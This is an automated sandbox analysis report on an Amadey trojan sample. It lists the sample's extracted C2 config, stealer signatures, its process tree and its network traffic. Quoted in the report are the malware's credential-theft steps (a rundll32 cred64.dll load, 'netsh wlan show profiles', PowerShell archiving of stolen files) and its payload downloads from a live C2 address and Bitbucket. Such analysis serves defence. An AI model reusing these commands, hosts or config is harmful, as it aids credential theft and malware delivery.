amadey | c62556c0c10d5441a43119bdc9ea3e5a0b92d2546ad0ad0b9cba482da8430bf1

Analysis

max time kernel
269s
max time network
286s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
22/07/2024, 05:12 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c62556c0c10d5441a43119bdc9ea3e5a0b92d2546ad0ad0b9cba482da8430bf1.exe
Size

9.6MB
MD5

4a0b3c363eeb8dfc1e9154dbc6a03a7b
SHA1

2e8077211e187d4add47910bacb888e66649bcec
SHA256

c62556c0c10d5441a43119bdc9ea3e5a0b92d2546ad0ad0b9cba482da8430bf1
SHA512

db8b6abb8f6907f8ab86cc3f240aa1bed980ad615f6bc60ac256ff14c516d84bd384d8fac410297dc7f6206fe4da61ef751ec13018122486374ddf0f6ecd05b3
SSDEEP

196608:jdo9nDnuwjlN2gpqjZenSR/Y6inpMnb3rn0jAtIE8Xtz9:jinDuklkZiSR/QnGnb3r0jeIEKz

Score

10^/10

amadey povertystealer 9ca5d0 execution persistence privilege_escalation spyware stealer trojan

Malware Config

Extracted

Family

amadey

Version

4.41

Botnet

9ca5d0

http://77.91.77.140

Attributes

install_dir
674c1801fe
install_file
Hkbsse.exe
strings_key
89fcde63d3a4658c6be472c7647616bc
url_paths
/g9bkfkWf/index.php

rc4.plain

1
8ed54a5ebdec825f800c722bd34b2bbc

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detect Poverty Stealer Payload 1 IoCs

resource	yara_rule
behavioral2/memory/2700-168-0x00000000000E0000-0x0000000000F9D000-memory.dmp	family_povertystealer

Poverty Stealer
Poverty Stealer is a crypto and infostealer written in C++.
stealer povertystealer

Blocklisted process makes network request 2 IoCs

flow	pid	Process
26	2824	rundll32.exe
28	2968	rundll32.exe

Downloads MZ/PE file

Executes dropped EXE 7 IoCs

pid	Process
1440	Hkbsse.exe
1968	Hkbsse.exe
4244	expert.exe
2700	ash.exe
1368	Hkbsse.exe
608	Hkbsse.exe
4696	Hkbsse.exe

Loads dropped DLL 3 IoCs

pid	Process
1708	rundll32.exe
2824	rundll32.exe
2968	rundll32.exe

Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
4	bitbucket.org
5	bitbucket.org
33	bitbucket.org

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\Hkbsse.job	c62556c0c10d5441a43119bdc9ea3e5a0b92d2546ad0ad0b9cba482da8430bf1.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4984	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Suspicious behavior: EnumeratesProcesses 29 IoCs

pid	Process
4240	c62556c0c10d5441a43119bdc9ea3e5a0b92d2546ad0ad0b9cba482da8430bf1.exe
4240	c62556c0c10d5441a43119bdc9ea3e5a0b92d2546ad0ad0b9cba482da8430bf1.exe
1440	Hkbsse.exe
1440	Hkbsse.exe
2824	rundll32.exe
2824	rundll32.exe
2824	rundll32.exe
2824	rundll32.exe
2824	rundll32.exe
2824	rundll32.exe
2824	rundll32.exe
2824	rundll32.exe
2824	rundll32.exe
2824	rundll32.exe
4984	powershell.exe
4984	powershell.exe
4984	powershell.exe
1968	Hkbsse.exe
1968	Hkbsse.exe
4244	expert.exe
4244	expert.exe
2700	ash.exe
2700	ash.exe
1368	Hkbsse.exe
1368	Hkbsse.exe
608	Hkbsse.exe
608	Hkbsse.exe
4696	Hkbsse.exe
4696	Hkbsse.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4984	powershell.exe

Suspicious use of WriteProcessMemory 21 IoCs

description	pid	Process	procid_target
PID 4240 wrote to memory of 1440	4240	c62556c0c10d5441a43119bdc9ea3e5a0b92d2546ad0ad0b9cba482da8430bf1.exe	72
PID 4240 wrote to memory of 1440	4240	c62556c0c10d5441a43119bdc9ea3e5a0b92d2546ad0ad0b9cba482da8430bf1.exe	72
PID 4240 wrote to memory of 1440	4240	c62556c0c10d5441a43119bdc9ea3e5a0b92d2546ad0ad0b9cba482da8430bf1.exe	72
PID 1440 wrote to memory of 1708	1440	Hkbsse.exe	73
PID 1440 wrote to memory of 1708	1440	Hkbsse.exe	73
PID 1440 wrote to memory of 1708	1440	Hkbsse.exe	73
PID 1708 wrote to memory of 2824	1708	rundll32.exe	74
PID 1708 wrote to memory of 2824	1708	rundll32.exe	74
PID 2824 wrote to memory of 1244	2824	rundll32.exe	75
PID 2824 wrote to memory of 1244	2824	rundll32.exe	75
PID 2824 wrote to memory of 4984	2824	rundll32.exe	77
PID 2824 wrote to memory of 4984	2824	rundll32.exe	77
PID 1440 wrote to memory of 2968	1440	Hkbsse.exe	79
PID 1440 wrote to memory of 2968	1440	Hkbsse.exe	79
PID 1440 wrote to memory of 2968	1440	Hkbsse.exe	79
PID 1440 wrote to memory of 4244	1440	Hkbsse.exe	81
PID 1440 wrote to memory of 4244	1440	Hkbsse.exe	81
PID 1440 wrote to memory of 4244	1440	Hkbsse.exe	81
PID 1440 wrote to memory of 2700	1440	Hkbsse.exe	82
PID 1440 wrote to memory of 2700	1440	Hkbsse.exe	82
PID 1440 wrote to memory of 2700	1440	Hkbsse.exe	82

C:\Users\Admin\AppData\Local\Temp\c62556c0c10d5441a43119bdc9ea3e5a0b92d2546ad0ad0b9cba482da8430bf1.exe
"C:\Users\Admin\AppData\Local\Temp\c62556c0c10d5441a43119bdc9ea3e5a0b92d2546ad0ad0b9cba482da8430bf1.exe"
1⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4240
- C:\Users\Admin\AppData\Local\Temp\674c1801fe\Hkbsse.exe
  "C:\Users\Admin\AppData\Local\Temp\674c1801fe\Hkbsse.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:1440
- - C:\Windows\SysWOW64\rundll32.exe
    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\8ed54a5ebdec82\cred64.dll, Main
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1708
  - - C:\Windows\system32\rundll32.exe
      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\8ed54a5ebdec82\cred64.dll, Main
      4⤵
      Blocklisted process makes network request
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:2824
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:1244
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\604470191232_Desktop.zip' -CompressionLevel Optimal
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4984
- - C:\Windows\SysWOW64\rundll32.exe
    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\8ed54a5ebdec82\clip64.dll, Main
    3⤵
    - Blocklisted process makes network request
    - Loads dropped DLL
    PID:2968
- - C:\Users\Admin\AppData\Local\Temp\1000001001\expert.exe
    "C:\Users\Admin\AppData\Local\Temp\1000001001\expert.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:4244
- - C:\Users\Admin\AppData\Local\Temp\1000005001\ash.exe
    "C:\Users\Admin\AppData\Local\Temp\1000005001\ash.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:2700

C:\Users\Admin\AppData\Local\Temp\674c1801fe\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\674c1801fe\Hkbsse.exe
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1968

C:\Users\Admin\AppData\Local\Temp\674c1801fe\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\674c1801fe\Hkbsse.exe
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1368

C:\Users\Admin\AppData\Local\Temp\674c1801fe\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\674c1801fe\Hkbsse.exe
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:608

C:\Users\Admin\AppData\Local\Temp\674c1801fe\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\674c1801fe\Hkbsse.exe
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4696

Network

POST

http://77.91.77.140/g9bkfkWf/index.php?scr=1

Hkbsse.exe

Remote address:

77.91.77.140:80

Request

POST /g9bkfkWf/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----NzU4OTY=
Host: 77.91.77.140
Content-Length: 76048
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 22 Jul 2024 05:13:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://77.91.77.140/g9bkfkWf/Plugins/cred64.dll

Hkbsse.exe

Remote address:

77.91.77.140:80

Request

GET /g9bkfkWf/Plugins/cred64.dll HTTP/1.1
Host: 77.91.77.140

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 22 Jul 2024 05:13:12 GMT
Content-Type: application/octet-stream
Content-Length: 1285120
Last-Modified: Sat, 20 Jul 2024 11:44:38 GMT
Connection: keep-alive
ETag: "669ba326-139c00"
Accept-Ranges: bytes
GET

http://77.91.77.140/g9bkfkWf/Plugins/clip64.dll

Hkbsse.exe

Remote address:

77.91.77.140:80

Request

GET /g9bkfkWf/Plugins/clip64.dll HTTP/1.1
Host: 77.91.77.140

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 22 Jul 2024 05:13:25 GMT
Content-Type: application/octet-stream
Content-Length: 130560
Last-Modified: Sat, 20 Jul 2024 11:44:40 GMT
Connection: keep-alive
ETag: "669ba328-1fe00"
Accept-Ranges: bytes
POST

http://77.91.77.140/g9bkfkWf/index.php

Hkbsse.exe

Remote address:

77.91.77.140:80

Request

POST /g9bkfkWf/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.77.140
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 22 Jul 2024 05:14:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://77.91.77.140/g9bkfkWf/index.php

Hkbsse.exe

Remote address:

77.91.77.140:80

Request

POST /g9bkfkWf/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.77.140
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 22 Jul 2024 05:14:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://77.91.77.140/g9bkfkWf/index.php

Hkbsse.exe

Remote address:

77.91.77.140:80

Request

POST /g9bkfkWf/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.77.140
Content-Length: 4
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 22 Jul 2024 05:13:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
POST

http://77.91.77.140/g9bkfkWf/index.php

Hkbsse.exe

Remote address:

77.91.77.140:80

Request

POST /g9bkfkWf/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.77.140
Content-Length: 158
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 22 Jul 2024 05:13:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

140.77.91.77.in-addr.arpa

Remote address:

8.8.8.8:53

Request

140.77.91.77.in-addr.arpa

IN PTR

Response
DNS

bitbucket.org

Hkbsse.exe

Remote address:

8.8.8.8:53

Request

bitbucket.org

IN A

Response

bitbucket.org

IN A

185.166.141.7

bitbucket.org

IN A

185.166.141.8

bitbucket.org

IN A

185.166.141.9
DNS

bitbucket.org

Hkbsse.exe

Remote address:

8.8.8.8:53

Request

bitbucket.org

IN A
GET

https://bitbucket.org/Programs_file/download/downloads/expert.exe

Hkbsse.exe

Remote address:

185.166.141.7:443

Request

GET /Programs_file/download/downloads/expert.exe HTTP/1.1
Host: bitbucket.org

Response

HTTP/1.1 302 Found

Date: Mon, 22 Jul 2024 05:13:06 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Server: AtlassianEdge
Location: https://bbuseruploads.s3.amazonaws.com/74eddf21-5def-4764-b6df-12efa9e0cd5e/downloads/6e806f89-6e04-4ef5-aced-2dc086f628b4/expert.exe?response-content-disposition=attachment%3B%20filename%3D%22expert.exe%22&AWSAccessKeyId=ASIA6KOSE3BNBKMVEH55&Signature=ZOptpmfcdbDAJDK0GAI8IErFwVg%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEJb%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJIMEYCIQC%2B%2B9xAlafuRd9tpRNPUeQaDSQhu95UAvDqmqjRa0iT%2FAIhALyn4y3kU0m5%2B%2BaSpw7InvjwNB1DVlXoWABm%2FTz0HIx9KqcCCG4QABoMOTg0NTI1MTAxMTQ2IgwnNl0EuyVKylHU5AkqhAJX%2B1fEWKJh%2FUAq4mkySqWC4pOnTBRV8IUyNg%2B%2F2L4eeG56YEjHL1r0Zr%2B5L0QcadSrAFVby719CUil7onH13wccKPiA7odD95sZy6e5IRR8zZSDYc1ABwHjzumXQRxrNJP5Dzvy3smB6Iu61TOd853haxN9KBT3p9LH7Rj4oI0UvusQzProattsw%2Bqc28qSFkwM8mIA14xxv%2F4ff2I0uJfKGf3in0YwFEjry%2BwhpNiLRjtT4eOGyt27GI7bPumsw%2FAGXVvkBdWvhm4izrBPmo0JKS%2FTiVSlGbhC2LoWq9szBW5BYCcrrb0CPRmHoEovsK2%2F%2FiUHAwAOvvFQDy8NMjSpKZ3rTDi1Pe0BjqcAfxuv%2FYK1aA94GzSe6R6VfseG%2Fy9XjDvkb8T2FHacq5LFiwMMPOAlkFFQCbF8w4yfrufbnnEEaLscgp2PEYrPktOZS1oU4BWGkFUOPGWWnrPGZmHesorsjzn8WUdVJQAPxyr5QqlE3n%2FXkQE%2BI5LcymETD%2FW3dhO%2Ba%2Bcjp2iOMjgFv25f7OAXXRpzvootlPPmvRzidE%2FoDosWN%2BXmA%3D%3D&Expires=1721626986
Expires: Mon, 22 Jul 2024 05:13:06 GMT
Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
X-Used-Mesh: False
Vary: Accept-Language, Origin
Content-Language: en
X-View-Name: bitbucket.apps.downloads.views.download_file
X-Dc-Location: Micros-3
X-Served-By: 3d3b46746d88
X-Version: efda2a1a4208
X-Static-Version: efda2a1a4208
X-Request-Count: 1461
X-Render-Time: 0.5181241035461426
X-B3-Traceid: dea70341fdc5451a955cd69c27bb5aa1
X-B3-Spanid: 9424695df47a7cce
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; object-src 'none'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://d301sr5gafysq2.cloudfront.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; base-uri 'self'; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://d301sr5gafysq2.cloudfront.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
X-Usage-Quota-Remaining: 987114.234
X-Usage-Request-Cost: 13030.57
X-Usage-User-Time: 0.323441
X-Usage-System-Time: 0.067476
X-Usage-Input-Ops: 0
X-Usage-Output-Ops: 0
Age: 0
X-Cache: MISS
X-Content-Type-Options: nosniff
X-Xss-Protection: 1; mode=block
Atl-Traceid: dea70341fdc5451a955cd69c27bb5aa1
Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
DNS

7.141.166.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

7.141.166.185.in-addr.arpa

IN PTR

Response
DNS

240.221.184.93.in-addr.arpa

Remote address:

8.8.8.8:53

Request

240.221.184.93.in-addr.arpa

IN PTR

Response
DNS

bbuseruploads.s3.amazonaws.com

Hkbsse.exe

Remote address:

8.8.8.8:53

Request

bbuseruploads.s3.amazonaws.com

IN A

Response

bbuseruploads.s3.amazonaws.com

IN CNAME

s3-1-w.amazonaws.com

s3-1-w.amazonaws.com

IN CNAME

s3-w.us-east-1.amazonaws.com

s3-w.us-east-1.amazonaws.com

IN A

52.216.97.99

s3-w.us-east-1.amazonaws.com

IN A

52.216.77.28

s3-w.us-east-1.amazonaws.com

IN A

52.216.94.243

s3-w.us-east-1.amazonaws.com

IN A

52.216.170.83

s3-w.us-east-1.amazonaws.com

IN A

52.216.104.67

s3-w.us-east-1.amazonaws.com

IN A

52.217.233.65

s3-w.us-east-1.amazonaws.com

IN A

3.5.24.166

s3-w.us-east-1.amazonaws.com

IN A

52.217.104.12
GET

https://bbuseruploads.s3.amazonaws.com/74eddf21-5def-4764-b6df-12efa9e0cd5e/downloads/6e806f89-6e04-4ef5-aced-2dc086f628b4/expert.exe?response-content-disposition=attachment%3B%20filename%3D%22expert.exe%22&AWSAccessKeyId=ASIA6KOSE3BNBKMVEH55&Signature=ZOptpmfcdbDAJDK0GAI8IErFwVg%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEJb%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJIMEYCIQC%2B%2B9xAlafuRd9tpRNPUeQaDSQhu95UAvDqmqjRa0iT%2FAIhALyn4y3kU0m5%2B%2BaSpw7InvjwNB1DVlXoWABm%2FTz0HIx9KqcCCG4QABoMOTg0NTI1MTAxMTQ2IgwnNl0EuyVKylHU5AkqhAJX%2B1fEWKJh%2FUAq4mkySqWC4pOnTBRV8IUyNg%2B%2F2L4eeG56YEjHL1r0Zr%2B5L0QcadSrAFVby719CUil7onH13wccKPiA7odD95sZy6e5IRR8zZSDYc1ABwHjzumXQRxrNJP5Dzvy3smB6Iu61TOd853haxN9KBT3p9LH7Rj4oI0UvusQzProattsw%2Bqc28qSFkwM8mIA14xxv%2F4ff2I0uJfKGf3in0YwFEjry%2BwhpNiLRjtT4eOGyt27GI7bPumsw%2FAGXVvkBdWvhm4izrBPmo0JKS%2FTiVSlGbhC2LoWq9szBW5BYCcrrb0CPRmHoEovsK2%2F%2FiUHAwAOvvFQDy8NMjSpKZ3rTDi1Pe0BjqcAfxuv%2FYK1aA94GzSe6R6VfseG%2Fy9XjDvkb8T2FHacq5LFiwMMPOAlkFFQCbF8w4yfrufbnnEEaLscgp2PEYrPktOZS1oU4BWGkFUOPGWWnrPGZmHesorsjzn8WUdVJQAPxyr5QqlE3n%2FXkQE%2BI5LcymETD%2FW3dhO%2Ba%2Bcjp2iOMjgFv25f7OAXXRpzvootlPPmvRzidE%2FoDosWN%2BXmA%3D%3D&Expires=1721626986

Hkbsse.exe

Remote address:

52.216.97.99:443

Request

GET /74eddf21-5def-4764-b6df-12efa9e0cd5e/downloads/6e806f89-6e04-4ef5-aced-2dc086f628b4/expert.exe?response-content-disposition=attachment%3B%20filename%3D%22expert.exe%22&AWSAccessKeyId=ASIA6KOSE3BNBKMVEH55&Signature=ZOptpmfcdbDAJDK0GAI8IErFwVg%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEJb%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJIMEYCIQC%2B%2B9xAlafuRd9tpRNPUeQaDSQhu95UAvDqmqjRa0iT%2FAIhALyn4y3kU0m5%2B%2BaSpw7InvjwNB1DVlXoWABm%2FTz0HIx9KqcCCG4QABoMOTg0NTI1MTAxMTQ2IgwnNl0EuyVKylHU5AkqhAJX%2B1fEWKJh%2FUAq4mkySqWC4pOnTBRV8IUyNg%2B%2F2L4eeG56YEjHL1r0Zr%2B5L0QcadSrAFVby719CUil7onH13wccKPiA7odD95sZy6e5IRR8zZSDYc1ABwHjzumXQRxrNJP5Dzvy3smB6Iu61TOd853haxN9KBT3p9LH7Rj4oI0UvusQzProattsw%2Bqc28qSFkwM8mIA14xxv%2F4ff2I0uJfKGf3in0YwFEjry%2BwhpNiLRjtT4eOGyt27GI7bPumsw%2FAGXVvkBdWvhm4izrBPmo0JKS%2FTiVSlGbhC2LoWq9szBW5BYCcrrb0CPRmHoEovsK2%2F%2FiUHAwAOvvFQDy8NMjSpKZ3rTDi1Pe0BjqcAfxuv%2FYK1aA94GzSe6R6VfseG%2Fy9XjDvkb8T2FHacq5LFiwMMPOAlkFFQCbF8w4yfrufbnnEEaLscgp2PEYrPktOZS1oU4BWGkFUOPGWWnrPGZmHesorsjzn8WUdVJQAPxyr5QqlE3n%2FXkQE%2BI5LcymETD%2FW3dhO%2Ba%2Bcjp2iOMjgFv25f7OAXXRpzvootlPPmvRzidE%2FoDosWN%2BXmA%3D%3D&Expires=1721626986 HTTP/1.1
Host: bbuseruploads.s3.amazonaws.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

x-amz-id-2: TM9c0N9Vh9oeEq0Ga8chUTq6NqCN9tNSL9q3uc+VFZ+nUSm5aGWBxbjUgT+moGKpw7kvi8DCHkc=
x-amz-request-id: 2T508AAX9DCNC1K8
Date: Mon, 22 Jul 2024 05:13:11 GMT
Last-Modified: Sun, 21 Jul 2024 00:49:24 GMT
ETag: "6b2804a0a870dbd23623063cd22740fb-2"
x-amz-server-side-encryption: AES256
x-amz-version-id: pJGCHg3ThyXSGFBQlpfEfcRNEiCeZse5
Content-Disposition: attachment; filename="expert.exe"
Accept-Ranges: bytes
Content-Type: application/x-msdownload
Server: AmazonS3
Content-Length: 10057216
GET

https://bbuseruploads.s3.amazonaws.com/74eddf21-5def-4764-b6df-12efa9e0cd5e/downloads/dadec6ec-b604-436e-8627-54b1d38756e3/ash.exe?response-content-disposition=attachment%3B%20filename%3D%22ash.exe%22&AWSAccessKeyId=ASIA6KOSE3BNEHVLW7YH&Signature=Ry%2B5wjPKEl6icGMoWp4FYztOsVY%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEJb%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIGIRfVctv6uOVDjw6mrBBRGusTnbFsHmK2M1GNju%2BdvTAiEAwX6jeFkiq0ebUzMrMACxAlIEyGm9raMoLzN5d0ZWSlQqpwIIbhAAGgw5ODQ1MjUxMDExNDYiDBWWBQFvyNqTXuFwzSqEAtBEHcTeMXxMYA3ykOyo66g5kjoEkAakifwDGXdGDVTDyB4%2FQ1oW6I%2B0jsVRp3VzXLPzePQ5mPQc2RejJt%2BCrCsX1epUb3J1HxacqdI2rKxgsj%2F%2BfuPP0ehvA2FOiXOOO8Fiv6zc0TVR6dch9aKMT%2B9ulfuPA7%2FJP3Zg0FmeNPPgr2T%2FsW9pkNnO4yYsHNxsWa2krP5EqFXjWU7Mahek7a5HowoZpED3exsFO9l5xVU%2FzdsiN9PSRMKD4vaQK6aNewDv0PvDoC3ZW9lUZKjZPQfAzIR6SS7EUmF62V%2BvhbvW3VzH8KXG4rttDx8MEMO2AscC7FVMpIxyrzXpNj5ctvs8DrEDMITV97QGOp0BnASNbq8ZXAkZsuF8JtLcoE7g48NN%2BlEXqAAun0VBcgqocpIYuqGc0kkoukMkBc6Ms37aSalzAJM7UPaqX%2FUtj2gV3Z1uRYFkX0i6U22B9PZTqTPo%2BY0HvDLmzGdmTV2WZKo9MFf5O7MuUu3xIHZ2qfHiuJjwB4ktUAJ%2FdAX5DAw5yMSL6NOQmFtnWfbv7M4iJ8OhKDRIz91MisV1mA%3D%3D&Expires=1721627020

Hkbsse.exe

Remote address:

52.216.97.99:443

Request

GET /74eddf21-5def-4764-b6df-12efa9e0cd5e/downloads/dadec6ec-b604-436e-8627-54b1d38756e3/ash.exe?response-content-disposition=attachment%3B%20filename%3D%22ash.exe%22&AWSAccessKeyId=ASIA6KOSE3BNEHVLW7YH&Signature=Ry%2B5wjPKEl6icGMoWp4FYztOsVY%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEJb%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIGIRfVctv6uOVDjw6mrBBRGusTnbFsHmK2M1GNju%2BdvTAiEAwX6jeFkiq0ebUzMrMACxAlIEyGm9raMoLzN5d0ZWSlQqpwIIbhAAGgw5ODQ1MjUxMDExNDYiDBWWBQFvyNqTXuFwzSqEAtBEHcTeMXxMYA3ykOyo66g5kjoEkAakifwDGXdGDVTDyB4%2FQ1oW6I%2B0jsVRp3VzXLPzePQ5mPQc2RejJt%2BCrCsX1epUb3J1HxacqdI2rKxgsj%2F%2BfuPP0ehvA2FOiXOOO8Fiv6zc0TVR6dch9aKMT%2B9ulfuPA7%2FJP3Zg0FmeNPPgr2T%2FsW9pkNnO4yYsHNxsWa2krP5EqFXjWU7Mahek7a5HowoZpED3exsFO9l5xVU%2FzdsiN9PSRMKD4vaQK6aNewDv0PvDoC3ZW9lUZKjZPQfAzIR6SS7EUmF62V%2BvhbvW3VzH8KXG4rttDx8MEMO2AscC7FVMpIxyrzXpNj5ctvs8DrEDMITV97QGOp0BnASNbq8ZXAkZsuF8JtLcoE7g48NN%2BlEXqAAun0VBcgqocpIYuqGc0kkoukMkBc6Ms37aSalzAJM7UPaqX%2FUtj2gV3Z1uRYFkX0i6U22B9PZTqTPo%2BY0HvDLmzGdmTV2WZKo9MFf5O7MuUu3xIHZ2qfHiuJjwB4ktUAJ%2FdAX5DAw5yMSL6NOQmFtnWfbv7M4iJ8OhKDRIz91MisV1mA%3D%3D&Expires=1721627020 HTTP/1.1
Host: bbuseruploads.s3.amazonaws.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

